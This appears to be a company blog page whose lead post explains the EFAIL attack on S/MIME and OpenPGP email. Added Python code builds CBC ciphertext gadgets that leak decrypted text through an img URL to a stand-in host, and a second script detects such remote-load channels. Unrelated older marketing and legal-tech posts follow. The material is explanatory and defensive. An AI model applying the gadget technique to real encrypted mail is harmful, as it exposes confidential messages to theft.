By Seth Hallem, Mobile Helix CEO, Co-founder, & Chief Architect
Secure email using S/MIME and OpenPGP is fundamentally broken. Our CEO explains the EFAIL vulnerability and why our LINK Email is not susceptible to EFAIL. What do we do next to protect email?
On Sunday night, a team of researchers from Germany and Belgium dropped a major bomb on the world of encrypted email by describing a simple, widely applicable and wildly effective technique for coercing email clients into leaking the contents of encrypted messages through "exfiltration channels." The concept is simple: by combining known manipulation techniques against the block cipher modes specified by the S/MIME and OpenPGP standards (the malleability of CBC and CFB mode ciphertext) with lax security choices in a wide variety of email clients, the research team was able to intercept and manipulate encrypted emails so that large blocks of their plaintext are revealed to a malicious server.
What is most brilliant (and most dangerous) about this attack is that it requires neither decrypting the messages nor stealing encryption keys. Hence, anyone who can obtain the ciphertext, for example as a man-in-the-middle on the infrastructure of the internet itself, can mount it; no specific email server or email client needs to be compromised.
The essential idea behind this attack is simple: HTML emails give a mail client a variety of reasons to query remote servers while rendering a message. The simplest (and most common) example is displaying images. Many marketing emails use tiny remotely hosted images to monitor who has opened an email. This technique is so pervasive that many of us have become desensitized to clicking the "Allow images from this sender" prompt in Outlook. It is common practice for marketing emails to carry essential content in remotely hosted images, which encourages users to allow the client to load all images in that message. Doing so, however, loads both the visible images and the tiny, single-pixel tracking images that marketing tools use to determine that we have opened the email in question.
The research team used these HTML exfiltration channels (e.g., loading images from a remote server) to place the decrypted contents of an email inside an unterminated img tag. In other words, by manipulating the ciphertext so that a block at the start of the message decrypts to an injected HTML tag of the form <img src="http://mailicious.my/, the researchers could ensure that the encrypted blocks containing the secret message were decrypted into the URL path of that unterminated img tag. When the client loads the image, the malicious server (mailicious.my) trivially reads the URL path and, hence, the secret contents of the email are stolen.
While the basic concept is simple, the details and the degree of vulnerability differ by protocol (S/MIME vs. OpenPGP) and by email client. OpenPGP is in a better position, because its Modification Detection Code (MDC) can detect that the ciphertext was manipulated, but that only helps if the decryption implementation treats an MDC failure as fatal and refuses to hand the plaintext to the renderer, a choice many email clients have not made. In addition, the more click-happy a user is in allowing remote images to load, the more likely the exploit is to succeed in any given email client.
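To make the two preceding paragraphs concrete, here is a constructed, runnable Python example added for this edit; it is not the researchers' code, nor Mobile Helix's. It uses a toy block cipher in CBC mode, builds the EFAIL gadget from nothing but the ciphertext and one guessed plaintext block, and then shows that a client which enforces an integrity check (an HMAC here, standing in for OpenPGP's MDC or authenticated encryption) never renders the tampered message. The host name x, the MIME header, the keys and the secret are all made up.

```python
"""Constructed EFAIL CBC-gadget demonstration (added example, not the paper's
or Mobile Helix's code). The block cipher is a toy 4-round Feistel network on
SHA-256: structurally a block cipher, not a secure one. Only the CBC algebra
matters, and it is identical for real AES-CBC."""
import hashlib
import hmac

BLOCK = 16
ROUNDS = 4


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Plain CBC without padding; the caller supplies whole blocks."""
    assert len(plaintext) % BLOCK == 0
    out, prev = [iv], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = toy_encrypt_block(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    """P_i = D(C_i) XOR C_{i-1}, with the first block acting as the IV."""
    return b"".join(
        _xor(toy_decrypt_block(key, ciphertext[i:i + BLOCK]), ciphertext[i - BLOCK:i])
        for i in range(BLOCK, len(ciphertext), BLOCK))


def cbc_gadget(c0: bytes, c1: bytes, known_p1: bytes, chosen: bytes) -> bytes:
    """Two ciphertext blocks (X, C1) whose second block decrypts to `chosen`:
    D(C1) XOR X = (P1 XOR C0) XOR (C0 XOR P1 XOR chosen) = chosen.
    No key is needed, only C0, C1 and the known plaintext P1."""
    assert len(chosen) == BLOCK
    return _xor(_xor(c0, known_p1), chosen) + c1


def efail_tamper(ciphertext: bytes, known_p1: bytes) -> bytes:
    """Wrap the whole message in an <img> whose URL path is the plaintext.
    Every gadget is followed by one block of unpredictable bytes, so those are
    parked inside attribute values (the paper's ignore="..." trick)."""
    c0, c1 = ciphertext[:BLOCK], ciphertext[BLOCK:2 * BLOCK]
    return (cbc_gadget(c0, c1, known_p1, b'<img ignore="aaa')    # then garbage
            + cbc_gadget(c0, c1, known_p1, b'" src="http://x/')  # then garbage
            + ciphertext            # C0 decrypts to garbage, then P1..Pn intact
            + cbc_gadget(c0, c1, known_p1, b'">'.ljust(BLOCK)))  # garbage, then close


def exfiltrated_url(html: bytes):
    """What a client that auto-loads remote images would request: the src
    value up to the next quote (a stray quote in a garbage block truncates it)."""
    start = html.find(b' src="')
    if start < 0:
        return None
    start += len(b' src="')
    end = html.find(b'"', start)
    return html[start:end] if end >= 0 else None


def seal(mac_key: bytes, ciphertext: bytes) -> bytes:
    return hmac.new(mac_key, ciphertext, hashlib.sha256).digest()


def verify_then_decrypt(key: bytes, mac_key: bytes, ciphertext: bytes, tag: bytes):
    """Stand-in for an enforced integrity check (OpenPGP MDC, AEAD): tampered
    ciphertext is never decrypted for the renderer."""
    if not hmac.compare_digest(seal(mac_key, ciphertext), tag):
        return None
    return cbc_decrypt(key, ciphertext)


def demo() -> dict:
    key, mac_key, iv = b"K" * 16, b"M" * 16, bytes(range(16))   # constructed
    secret = b"Board approves the merger on Friday."             # constructed
    plaintext = b"Content-Type: text/plain\r\n\r\n" + secret
    plaintext += b" " * (-len(plaintext) % BLOCK)
    ciphertext = cbc_encrypt(key, iv, plaintext)
    tag = seal(mac_key, ciphertext)
    # The attacker only guesses the MIME header that opens every message.
    tampered = efail_tamper(ciphertext, known_p1=plaintext[:BLOCK])
    html = cbc_decrypt(key, tampered)          # what a lax client renders
    return {
        "roundtrip_ok": cbc_decrypt(key, ciphertext) == plaintext,
        "rendered_html": html,
        "secret_in_html": secret in html,
        "leaked_via_img": secret in (exfiltrated_url(html) or b""),
        "integrity_check_rejects": verify_then_decrypt(key, mac_key, tampered, tag) is None,
        "integrity_check_accepts_original":
            verify_then_decrypt(key, mac_key, ciphertext, tag) == plaintext,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Running the script prints the rendered HTML: an img tag whose URL path carries the entire plaintext, with one block of unpredictable bytes after each gadget. `leaked_via_img` reports whether, for these constructed keys, those bytes happened to contain no quote character; the real attack lives with the same small failure probability. Nothing in the gadget depends on the cipher, which is why the same arithmetic works against AES-CBC in S/MIME, and why only an integrity check enforced before rendering (the last two fields) actually stops it.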
What is most alarming about this attack is that there is no single bug to fix, and the presence (or absence) of a corporate email security gateway has no bearing on whether the attack succeeds. In summary, secure email using S/MIME and OpenPGP is fundamentally broken. It may well be fatally broken, because upgrading these protocols across the many email clients and security gateways that implement them is an essentially intractable problem.
Our product, LINK, has no particular stake in this game: we do not support S/MIME or OpenPGP in the email client, as those protocols are generally implemented at the gateway level in a corporate context. However, LINK does have one distinct advantage over most email clients: we run strict HTML validation on every email, using the OWASP Java HTML Sanitizer, before it is delivered to the client. Hence, emails with unclosed img tags (the open-ended manipulation that feeds secret data into a URL path) fail sanitization, and what reaches our email client is an empty message. It would take a far more extensive investigation to establish that the LINK email client definitively blocks every possible "exfiltration channel," but the simple examples presented in the paper will not work against LINK email.
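As an added example (not LINK's own implementation, which the post says is built on the OWASP Java HTML Sanitizer), the following Python code shows the check that matters against EFAIL's exfiltration channels: enumerating everything in an HTML message that would make a client contact a remote server before the user clicks anything, and refusing to render when anything is found. The sample messages, host names and class name are constructed for this example.

```python
"""Constructed remote-content gate for HTML mail (added example, not LINK's
code). Lists every element or style rule that a renderer would fetch on its
own, i.e. every exfiltration channel of the kind EFAIL uses."""
import re
from html.parser import HTMLParser

# Attributes that browsers and mail clients fetch automatically on render.
AUTOLOAD_ATTRS = {"src", "href", "background", "poster", "data", "srcset"}
REMOTE_URL = re.compile(r"^\s*(https?:)?//", re.I)        # absolute or protocol-relative
CSS_REMOTE_URL = re.compile(r"url\(\s*['\"]?\s*(https?:)?//", re.I)


class RemoteLoadFinder(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[tuple[str, str, str]] = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        for name, value in attrs:
            if value is None:
                continue
            # <a href> needs a click; any other remote URL is loaded on render.
            if name in AUTOLOAD_ATTRS and tag != "a" and REMOTE_URL.match(value):
                self.findings.append((tag, name, value))
            elif name == "style" and CSS_REMOTE_URL.search(value):
                self.findings.append((tag, "style", value))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # <style> bodies are passed through as data; CSS url() also fetches.
        if self._in_style and CSS_REMOTE_URL.search(data):
            self.findings.append(("style", "css", data.strip()))


def remote_loads(html: str) -> list[tuple[str, str, str]]:
    parser = RemoteLoadFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


def safe_to_render(html: str) -> bool:
    """Policy used here: display the message only if nothing would be fetched."""
    return not remote_loads(html)


# Constructed messages; the first mimics what an EFAIL gadget chain decrypts to.
SAMPLES = {
    "efail_img": '<img ignore="aaaZZZ" src="http://x/GARBAGE Content-Type: text/plain secret GARBAGE">',
    "inline_style": '<div style="background:url(//track.example/p.gif)">Hi</div>',
    "style_block": '<style>body{background:url(https://t.example/x.png)}</style><p>Hi</p>',
    "stylesheet": '<link rel="stylesheet" href="https://t.example/m.css">',
    "clean": '<p>Quarterly numbers attached.</p><img src="cid:logo@mail">',
    "link_only": '<a href="https://example.com/">needs a click</a>',
}


def audit(samples: dict = SAMPLES) -> dict:
    return {name: safe_to_render(html) for name, html in samples.items()}


if __name__ == "__main__":
    for name, ok in audit().items():
        print(f"{name}: {'render' if ok else 'BLOCK'} {remote_loads(SAMPLES[name])}")
```

The point of the gate is the same one the post makes about LINK: if nothing in the message can cause a request, there is no channel for decrypted bytes to leave the device, whichever trick put them into the HTML. Note that an unterminated tag at the end of a message is treated as text by this parser, as it is by HTML5 tokenizers, so the check focuses on tags that would actually trigger a load.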
Email was never designed with security in mind. Had it been, encryption standards like S/MIME and OpenPGP would have been built into the SMTP protocol itself rather than layered on top and left to individual clients and gateway solutions to implement with varying degrees of care. LINK Email, by contrast, was designed with security in mind and, hence, we are more careful than most about what content we choose to display in the LINK client. We have not yet, however, set out to solve the problem of end-to-end confidentiality and integrity for email messages; at the moment, our customers rely on the same gateway solutions that have just proven vulnerable.
When it comes to sending confidential email, S/MIME and OpenPGP, including the various gateway solutions that automatically encrypt using those protocols, are no longer safe choices. It is time for enterprises to look to an IRM-based solution, such as Microsoft Azure Rights Management, that protects email with modern encryption that is not vulnerable to the message manipulation technique employed in this exploit. In the long run, the user experience of email is here to stay, but the underlying technology needs to evolve: security needs to be designed into email transport. Until that happens, email will remain a ripe target for hackers and thieves.
ILTACON offers a unique opportunity for members to learn from Legal IT peers and to see the latest in legal technology. We will be demonstrating our LINK mobile app for lawyers.
Stop by booth 820 to see how easy it is to:
- View an NRL, with redlines and comments, in LINK Email
- Send and file-to DMS
- Check a doc into DMS
- Search DMS and email a doc
And LINK’s two new features:
By Seth Hallem, Mobile Helix CEO and co-founder
On March 28th, the Department of Justice confirmed that it had successfully unlocked the San Bernardino shooter’s iPhone 5C without Apple’s assistance. On that same day, the US government moved to vacate a California court order that had attempted to force Apple to assist in the decryption of the device. While the legal maneuverings are fascinating in their own right, the conclusion leads to an even more fascinating technology discussion – how did the FBI crack the iPhone, and what are the implications of this successful hack?
The 10th Annual 2015 ILTA / InsideLegal Technology Purchasing Survey was released at ILTACON last week. It’s a quick read and I recommend taking a look at the entire report.
As an introduction to the tech survey, I’ve highlighted the five points that I found most interesting and indicative of our times.
It flew by like lightning and now the carpet has literally been rolled up on the ABA TECHSHOW 2015. As always, the best part was the chance to network with lawyers who are not only tech savvy but tech enthusiasts and very generous with their knowledge. I attended the “60 iOS Apps in 60 Minutes Session”, which was deeply informative and lots of fun. A few of the top recommendations were:
TranscriptPad – Review and annotate transcripts. Per Jeff Richardson, @iPhoneJD, “at $90 worth twice the price.”
Overcast – Legal podcasts are a popular way to keep up with the latest in legal technology. Overcast is free for the basic version, but the $5 version is particularly productive. It removes the spaces between words and accelerates speed. Adriana Linares, @AdrianaL, especially likes that with Overcast you can send a colleague a link to a specific episode of a podcast.
Scannable by Evernote – An easy way to scan docs and business cards. Email docs or save to several apps including Evernote. Free. Recommended by Tom Mighell, @TomMighell.
Automatic App – This app provides data from your car, including mileage driven and service reminders. Joe Bahgat, @j0eybagodonuts, recommends it as it makes tracking business usage of your car a breeze. $99.95 for the adapter which plugs into your car’s diagnostic port.
There were 56 more apps, including Headspace, for mindfulness/meditation, and the Sonos speaker controller. Jeff Richardson will post them all this week on his blog, iPhoneJD.
Mobile Helix made two major announcements. We released the new version of our mobile app for lawyers, LINK 2.0. LINK 2.0 integrates with WorkSite/FileSite and NetDocuments so that lawyers can securely access their docs and email them to clients and colleagues from smartphones and tablets. With LINK, when you send a colleague a doc which is stored in WorkSite she will receive a viewable .nrl attachment.
Two terrific new features, doc editing and file-to-WorkSite/FileSite, will be released later this quarter.
NetDocuments announced their new Apps Marketplace at ABA TECHSHOW. We are thrilled to be one of their partners. Using their APIs we integrated LINK with NetDocuments so that NetDocuments users can access their docs, Outlook, SharePoint, and other apps from one secure app, LINK, without having to sign-on to each app. LINK’s efficient integration makes it easy to draft an Outlook email, attach a doc stored in NetDocuments, and send it to a client from your smartphone or tablet.
You can test drive LINK for free. Download LINK from the App Store here and follow the directions to “Take a Test Drive.” Try composing an email and attaching a file from SharePoint. If you have a NetDocuments account, you can log in to NetDocuments from the LINK app and access your own docs in LINK.
Take LINK for a drive. We would love to know what you think!
maureen at mobilehelix dot com
As the story goes, the young Isaac Newton was sitting in his garden when an apple fell onto his head and, in a stroke of brilliant insight, he suddenly invented the theory of gravity.[1] The story is almost certainly embellished, though it has found its place in popular culture, and has been taught to generations of young receptive science students ever since.
Winding the clock forward to 2015 brings us to a whole new and different kind of Apple (NASDAQ:AAPL). On January 29th Apple reported the most profitable quarter of any company in history. This is an incredible achievement. Examining how Apple has achieved this milestone is even more amazing.
Apple’s sales and profitability are driven by sales of the iPhone (currently 69% of revenues), and more specifically by the new iPhone 6 and 6 Plus. During the last quarter, Apple sold a staggering 74.5 million iPhones. This equates to 830,000 devices per day or 35,000 per hour for 24 hours per day, 7 days per week. This represents a 46% increase in iPhone sales year-on-year, while simultaneously increasing the iPhone average selling price by $50 to $687 per unit. For reference, average smartphone prices have declined from $440 in 2010 to an estimated $275 in 2015. Apple defies gravity… again, indeed.
To quote from Motley Fool:[2] “That Apple can deliver both massive sales volume and rising prices in the context of rapidly declining industry prices speaks wonders about Apple’s competitive differentiation and the booming popularity of its new iPhone 6 and 6 Plus models”. Many congratulations to Tim Cook and the whole Apple team on this achievement.
As companies get bigger, continued rapid growth gets much, much harder. It is therefore tempting to assume that Apple’s incredible performance cannot be sustained. The Economist sums the problem up well in “Apple Reigns Supreme”.[3]
However, Apple’s recent history suggests otherwise. Apple will launch its much awaited (and much hyped) Apple Watch in April. Will this new device completely redefine the watch and show us all the critical things that we have been missing until now, or, will it fade as a niche luxury product that only appeals to the wealthy and tech obsessed?
No one knows for sure. We will have to wait and see. However, I suspect that we will be reading similar glowing coverage later this year as Apple Defies Gravity… Again.